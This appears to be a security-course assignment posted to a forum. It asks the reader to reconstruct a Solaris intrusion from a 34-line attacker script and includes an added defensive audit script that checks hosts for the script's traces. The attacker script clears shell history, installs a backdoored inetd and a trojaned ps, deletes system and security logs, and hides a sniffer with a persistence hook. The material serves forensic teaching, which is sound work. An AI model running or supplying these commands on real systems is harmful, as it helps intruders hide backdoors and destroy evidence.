Hi, I have the following assignment and need a solution.
I would be grateful for any help.
You are the Chief Security Officer of PayByMobile Inc., a company which provides online payment services.
It is Monday morning and you are just trying to get your first cup of coffee to start the day when Bill, your server farm admin, calls you and reports unusual behavior on some of the Solaris machines. When he was working on the console he got messages that inetd could not bind to ports 21 and 23. When he examined the processes that were running he found that three instances of inetd were running. This was not supposed to happen, so he killed two of them. Then he checked the other Solaris systems and found two more with the same problems.
You start searching the machines and find an unknown file n00b.tar. The file contained the following other files: act, temp, ps and update. You open the act file and find it to be a script that could tell you what was done to your systems. You find the script below.
Please answer the following questions:
- Try to reconstruct what the attacker was doing and explain every line of the script! (refer to the line numbers)
- Which files are changed in the system and which of those files is likely to be a backdoor?
- Given that the program update is a sniffer, where did the attacker hide the program and its log file? Why do you think the attacker has chosen this location?
1 unset HISTFILE; unset SAVEHIST
2 cp temp /usr/sbin/inetd;
3 chown root /usr/sbin/inetd;
4 chgrp root /usr/sbin/inetd;
5 touch 0716000097 /usr/sbin/inetd;
6 rm -rf temp /tmp/bob /var/adm/messages /usr/lib/nfs/statd /usr/openwin/bin/rpc.ttdb* /usr/dt/bin/rpc.ttdb*
7 rm -rf /var/log/messages /var/adm/sec* /var/adm/mail* /var/log/mail* /var/adm/sec*
8 /usr/sbin/inetd -s;
9 /usr/sbin/inetd -s;
10 telnet localhost;
11 /usr/sbin/inetd -s;
12 ps -ef | grep inetd | grep bob |awk '{print "kill -9 " $2 }' > boo
13 chmod 700 boo
14 ./boo
15 ps -ef | grep nfs | grep statd |awk '{print "kill -9 " $2 }' > boo
16 chmod 700 boo
17 ./boo
18 ps -ef | grep ttdb | grep -v grep |awk '{print "kill -9 " $2 }' > boo
19 chmod 700 boo
20 ./boo
21 rm -rf boo
22 mkdir /usr/man/tmp
23 mv update ps /usr/man/tmp
24 cd /usr/man/tmp
25 echo 1 \"./update -s -o output\" > /kernel/pssys
26 chmod 755 ps update
27 ./update -s -o output &
28 cp ps /usr/ucb/ps
29 mv ps /usr/bin/ps
30 touch 0716000097 /usr/bin/ps /usr/ucb/ps
31 cd /
32 ps -ef | grep bob | grep -v grep
33 ps -ef | grep stat | grep -v grep
34 ps -ef | grep update
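As an added example (not part of the original post or of the assignment), the following read-only audit turns the traces the "act" script leaves behind into checks a responder could run on the other Solaris hosts or on a mounted disk image. Every path it looks for comes from the script's own lines (/usr/man/tmp, /kernel/pssys, the deleted logs, the removed statd, the two copies of ps). Two things are assumptions: that on a stock system /usr/bin/ps and /usr/ucb/ps are different programs, so byte-identical copies indicate the replacement from lines 28-29, and the "ps -ef" sample, which is constructed to mirror Bill's report and is not real data.

```shell
#!/bin/sh
# Added example, not part of the original post or assignment: a read-only audit
# for the traces the "act" script would leave on a Solaris host. Every path
# comes from the script's own lines; the root-directory argument lets it run
# against a mounted disk image instead of the live system.

# Check filesystem indicators under root directory $1 (default "/").
# Prints one line per indicator and returns 1 if any were found, 0 if clean.
audit_act_indicators() {
  root="${1:-/}"
  root="${root%/}"   # "/" becomes "", so paths below stay well-formed
  found=0

  # Lines 22-24: "update" (sniffer) and the trojaned "ps" are staged in
  # /usr/man/tmp, a directory a stock Solaris system does not have.
  if [ -d "$root/usr/man/tmp" ]; then
    echo "INDICATOR: $root/usr/man/tmp exists (script lines 22-24)"
    found=1
  fi
  # Line 27: the sniffer writes its log to a file named "output" there.
  if [ -f "$root/usr/man/tmp/output" ]; then
    echo "INDICATOR: sniffer log $root/usr/man/tmp/output present (line 27)"
    found=1
  fi
  # Line 25: a restart hook for the sniffer is written to /kernel/pssys.
  if [ -e "$root/kernel/pssys" ]; then
    echo "INDICATOR: $root/kernel/pssys present (line 25)"
    found=1
  fi
  # Lines 6-7: system and security logs are deleted; their absence is a signal.
  for f in var/adm/messages var/log/messages; do
    if [ ! -e "$root/$f" ]; then
      echo "INDICATOR: log $root/$f missing (lines 6-7)"
      found=1
    fi
  done
  # Line 6: the statd daemon binary is removed.
  if [ ! -e "$root/usr/lib/nfs/statd" ]; then
    echo "INDICATOR: $root/usr/lib/nfs/statd missing (line 6)"
    found=1
  fi
  # Lines 28-29: one trojan binary is copied over both ps variants.
  # Heuristic (assumption): on a stock system /usr/bin/ps and /usr/ucb/ps are
  # different programs, so byte-identical copies point at the replacement.
  if [ -f "$root/usr/bin/ps" ] && [ -f "$root/usr/ucb/ps" ] &&
     cmp -s "$root/usr/bin/ps" "$root/usr/ucb/ps"; then
    echo "INDICATOR: /usr/bin/ps and /usr/ucb/ps are identical (lines 28-29)"
    found=1
  fi
  return $found
}

# Count the lines of captured "ps -ef" output ($1) matching awk regex $2.
# Bill saw three inetd instances; because the installed ps may be the trojan,
# collect this output with a ps binary from read-only media or a clean host.
count_ps_matches() {
  printf '%s\n' "$1" | awk -v pat="$2" '$0 ~ pat { n++ } END { print n + 0 }'
}

# Constructed sample of "ps -ef" output mirroring the state Bill reported
# (three inetd instances) plus the sniffer started on line 27. Not real data.
SAMPLE_PS='     UID   PID  PPID  C    STIME TTY      TIME CMD
    root     0     0  0   Jul 16 ?        0:01 sched
    root     1     0  0   Jul 16 ?        0:02 /etc/init -
    root   143     1  0   Jul 16 ?        0:00 /usr/sbin/inetd -s
    root   312     1  0 07:55:02 ?        0:00 /usr/sbin/inetd -s
    root   314     1  0 07:55:04 ?        0:00 /usr/sbin/inetd -s
    root   320     1  0 07:55:09 ?        0:00 ./update -s -o output'

# Usage: sh audit_act.sh /mnt/image   (a mounted image, or / for the live root)
if [ "$#" -gt 0 ]; then
  audit_act_indicators "$1" || echo "indicators found; treat the host as compromised"
  echo "inetd instances in sample ps output: $(count_ps_matches "$SAMPLE_PS" '/usr/sbin/inetd')"
fi
```

Run it against a mounted image rather than the live root where possible: the script replaces ps itself (lines 28-29), so anything the compromised host reports about its own processes is suspect, which is also why the process count works on captured text instead of calling ps.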